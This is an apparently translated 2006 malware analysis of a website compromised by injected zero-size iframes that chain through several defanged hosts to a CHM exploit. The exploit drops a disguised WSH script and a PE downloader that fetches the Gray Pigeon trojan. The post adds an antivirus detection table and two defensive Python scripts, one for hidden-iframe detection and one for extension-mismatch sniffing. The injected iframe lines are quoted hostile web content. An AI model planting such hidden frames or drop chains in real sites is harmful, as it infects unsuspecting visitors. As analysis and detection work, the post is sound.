Original by endurer
2006-05-04, 1st edition
A certain website had the following injected into it:
<iframe src="hxxp://95762.***512j.com/" width="0" height="0">
The content of hxxp://95762.***512j.com/index is:
<iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"></iframe>
The content of hxxp://www.***kkkshop.com/images/index.htm is:
<iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"></iframe>
The content of hxxp://www.***kkkshop.com/cnshop/img/index.htm is the escope() code, which exploits the CHM vulnerability to download two files, young.gif and young.css.
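The redirection chain above is three nested zero-size iframes deep before the exploit page is reached. The following added example (not code from the original post) shows how a defender can flag such invisible frames in a page and walk the chain offline. It assumes a constructed cache of page contents, with `hxxp://victim.example/` standing in for the compromised site and the exploit page reduced to an empty placeholder; the hidden-frame heuristics (0/1-pixel dimensions, `display:none`, `visibility:hidden`) are my own.

```python
from html.parser import HTMLParser

# Constructed offline cache of page contents standing in for the chain described
# above. The victim URL is a placeholder; the final exploit page is represented
# by an empty placeholder document.
PAGES = {
    "hxxp://victim.example/":
        '<iframe src="hxxp://95762.***512j.com/" width="0" height="0">',
    "hxxp://95762.***512j.com/":
        '<iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"></iframe>',
    "hxxp://www.***kkkshop.com/images/index.htm":
        '<iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"></iframe>',
    "hxxp://www.***kkkshop.com/cnshop/img/index.htm":
        "<html><body><!-- exploit page content omitted --></body></html>",
}


class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags whose attributes make them invisible to the visitor."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().lower()
            if val.endswith("px"):
                val = val[:-2].strip()
            if val.isdigit() and int(val) <= 1:  # 0 or 1 pixel: not meant to be seen
                reasons.append(f"{dim}={a[dim]}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("style hides frame")
        if reasons:
            self.hits.append({"src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return the hidden iframes found in one HTML document."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


def follow_chain(pages, start, max_depth=10):
    """Walk hidden-iframe redirections through the offline cache, stopping at
    the first page without one, at a loop, or after max_depth hops."""
    chain = [start]
    seen = {start}
    url = start
    for _ in range(max_depth):
        html = pages.get(url)
        if html is None:
            break
        hits = find_hidden_iframes(html)
        if not hits:
            break
        url = hits[0]["src"]
        if url in seen:
            chain.append(url + " (loop)")
            break
        chain.append(url)
        seen.add(url)
    return chain


if __name__ == "__main__":
    for hop in follow_chain(PAGES, "hxxp://victim.example/"):
        print(hop)
```

Run against the constructed cache, `follow_chain` reports the four hops of the chain, ending at the cnshop/img/index.htm page. In practice the same parser can be run over a site's own pages to catch an injected frame early, since a legitimate site almost never embeds a 0x0 frame pointing at a foreign host.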
young.gif uses WSH to search the IE temporary cache for young.css, copies it to C:/arcldrer.exe and runs it; it creates c:/cmd.bat to wipe its traces.
| Antivirus | Version | Update | Result |
|---|---|---|---|
| AntiVir | 6.34.0.24 | 04.20.2006 | no virus found |
| Avast | 4.6.695.0 | 05.03.2006 | no virus found |
| AVG | 386 | 05.04.2006 | no virus found |
| Avira | 6.34.1.58 | 05.03.2006 | no virus found |
| BitDefender | 7.2 | 05.04.2006 | Exploit.HTML.Mht.ABR |
| CAT-QuickHeal | 8.00 | 05.03.2006 | no virus found |
| ClamAV | devel-20060426 | 05.03.2006 | no virus found |
| DrWeb | 4.33 | 05.03.2006 | Trojan.DownLoader.4263 |
| eTrust-InoculateIT | 23.71.146 | 05.04.2006 | no virus found |
| eTrust-Vet | 12.4.2191 | 05.02.2006 | no virus found |
| Ewido | 3.5 | 05.03.2006 | no virus found |
| Fortinet | 2.71.0.0 | 05.04.2006 | no virus found |
| F-Prot | 3.16c | 05.03.2006 | no virus found |
young.css is a PE-format file; it downloads hxxp://www.***huayimei.com/bbs/Images/manage/zone.exe and saves it as C:/Program Files/zone.exe. This is Gray Pigeon (灰鸽子).
Rising (瑞星) reports young.css as Trojan.DL.Delf.it.
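Both downloaded files hide behind a misleading extension: young.gif is really a WSH script and young.css is really a PE executable. The added example below (not code from the original post) is the kind of content-versus-extension check a proxy or cache scanner can apply to catch this. The sample bytes are constructed stand-ins, not the real samples: young.css mimics a minimal MZ/PE header and young.gif a script served as an image; the sniffing heuristics and the expected-kind table are my own assumptions.

```python
import string
import struct

# Constructed stand-ins for the two downloaded files plus two benign controls.
# These are NOT the real samples: young.css mimics a minimal MZ/PE header and
# young.gif mimics a script file served under an image extension.
SAMPLES = {
    "young.css": b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00" + b"\x00" * 32,
    "young.gif": b'<script language="vbscript">\r\n\' script body omitted\r\n</script>',
    "logo.gif": b"GIF89a" + b"\x00" * 16,
    "style.css": b"body { color: #000; }\n",
}

# What each extension is expected to carry (assumed mapping); anything else is a mismatch.
EXPECTED_KIND = {".gif": "gif", ".css": "text", ".htm": "html", ".html": "html", ".exe": "pe"}


def is_pe(data):
    """True when data has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff(data):
    """Classify content by its leading bytes, ignoring the file name entirely."""
    if is_pe(data):
        return "pe"
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "gif"
    head = data[:512].lower()
    if b"<html" in head or b"<iframe" in head:
        return "html"
    if b"<script" in head or b"createobject(" in head or b"wscript." in head:
        return "script"
    printable = set(string.printable.encode())
    if all(b in printable for b in head):
        return "text"
    return "binary"


def find_mismatches(files):
    """Return the sorted names whose sniffed content kind disagrees with the extension."""
    bad = []
    for name, data in files.items():
        ext = name[name.rfind("."):].lower() if "." in name else ""
        expected = EXPECTED_KIND.get(ext)
        if expected is not None and sniff(data) != expected:
            bad.append(name)
    return sorted(bad)


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name}: sniffed as {sniff(data)}")
    print("mismatches:", find_mismatches(SAMPLES))
```

On the constructed set the check flags exactly young.css (PE under a .css name) and young.gif (script under a .gif name) while the genuine GIF and stylesheet pass. Checking the e_lfanew pointer rather than just the `MZ` prefix keeps the PE test from firing on text that merely starts with those two letters.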